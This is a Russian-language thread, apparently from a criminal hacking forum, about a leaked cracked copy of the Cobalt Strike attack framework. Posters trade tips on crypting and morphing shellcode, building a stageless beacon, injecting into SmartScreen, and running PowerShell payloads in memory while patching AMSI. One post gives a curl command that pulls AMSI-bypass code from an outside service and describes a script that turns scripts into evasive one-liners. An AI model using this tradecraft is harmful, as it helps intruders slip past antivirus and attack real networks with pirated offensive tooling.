Кинь на самого себя жалобу за то что ты чудак на букву "м". Сталинские времена уже прошли, а жалобы писать не разучились.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
прочее Cobalt Strike v 4.3
- Автор темы yashechka
- Дата начала
Есть мануал на английском. Может кто перевести бесплатно, во благо общества.
Ещё один Кобальта 4.3 со всеми плагинами
ты прав, но зачем через телегу распространять?
чтоб школьники юзали?
один хрен загадится, нужно шеллкод морфить, дописывать. чем больше школьников сольют, тем больше мне будет работы.
колесо сансары повернулось!
Криптор, дельфи, пистолет
Я криптую с семи лет!
PS уже все кому не лень сливают, как минимум два канала, врятли школьники знают зачем им кобальт, врятли они понимают как много людей его пользуют. а те кто зарабатывает на нем, могут и купить крипт, в лучшем случае сделать его самостоятельно. и не факт что источник канала и данный пост имеют одинаковое происхождение. я к сожалению не могу заглянуть под хайд и сравнить. всего лишь навыки гугла помогли заполучить версию
а навыки нахлебника помогли заполучить артефакт кит, который я ковыряю сейчас дабы разобраться в нем, и в будущем улутшить (надеюсь).
а вот ныть про хайды, это глупо, лучше поставь яше лайк за то что он сказал тебе о том что кобальт слит, и не гунди, делай свою работу дальше, сам же такой же грешный как и мы все, и покоя тебе не будет, как и нам всем
Последнее редактирование:
Ну да, как вариант)
Чем не устроил перевод в этой теме?
Видео на русском про Cobalt: https://www.youtube.com/channel/UC0nLdzG_x4SezDorJG6t1Wg
версия от 3 марта или от 17 (где пофикшены баги) ?
Y menya version 21 March licenced
Ужас. Морфить шеллкод! Это его морфинчиком, да? Артифакт-кит не менялся уже лет 6, оно и не нужно. За пол-дня (уровень кодера с++ где-то 0.1 из 5) без морфина и прочей чуши получил стабильный stageless бикон, попутно "поправил" сам cobaltstrike (уровень кодера java еще меньше). Сделал стабильный инжект в смартскрин (скрипту тыщща лет, сегодня немного дописал просто). Насчет какая у кого версия - смех =) Багами вы называете EICAR в шеллкоде?))))))
Блин. Забыл, а то ща начнется, пруууууф))) пруф вот =>
Так как наш с тобой срач удалили, я тебе расскажу для чего это делается...
Зачастую при использовании этого софта - нужно подстраиваться по то что он предназначен для аттаки на сети
Из чего следует что зачастую приходится использовать например powershell. И бинарный файл это слишком другое,
что бы запускать его через "PSExec", требуется баллансировать на интерпретируемом языке powershell, для того что бы
не дропать на диск бинарный файл как у тебя, а запускать его из памяти, при этом обусфицируя как и пауршелл, так и
патчить амси
Я про баги вообще ничего не говорил, и меня бесит что ты припысываешь мне "не мои" слова
Пожалуйста нормально общайся, если хочешь что бы с тобой нормально общались
Я не понимаю из за чего ты до меня пристал, не понимаю хоть убей. Я вообще как мы выяснили ранее - ПТУшник, и со мной дел не стоит иметь, и под шконкой мое место.
И не имеет смысла тебя учить хоть чему то - потому что ты очень много знаешь. Так что я даже не жду что ты ответишь что то внятное.
пауэршелл (и как язык у тебя поворачивается?) слово модное конечно, и амси и остальные что ты говоришь. но вот проблема в том, что само слово powershell в скрипте либо в исполнении бикона (или пэйлоада, или любого другого процесса не связанного с HID) сразу же тригает вд и другие ав... ну если вдруг твои машины уникальны и исполняют ps так же хорошо, как длл или ехе (лучше юзай powerpick, хотя врядли конечно) то мой тебе совет не парится (за тебя уже запарились) и для патчинга амси используй
curl -sL https://amsi-fail.azurewebsites.net/api/Generate | tail -n+2 . ну и я совсем уж добрый (не для тебя, ПТУшника) кому нужно: прикрепленный файл делаем исполняемым chmod +x xen.txt и просто ./xen.txt ваш_скрипт.ps1 => получим one-liner (кстати очень удобная штука есть с одноименным названием, pip3 install one-lin3r) =). Ваш модифицированный скрипт включает и амси-патчинг и исполнение через нагрузку процессора и остальные приятные плюшки =)
При установки пишет что отсутствует cobaltstrike.auth
Может кто поделится опытом, что делаю не так? (debian 10)
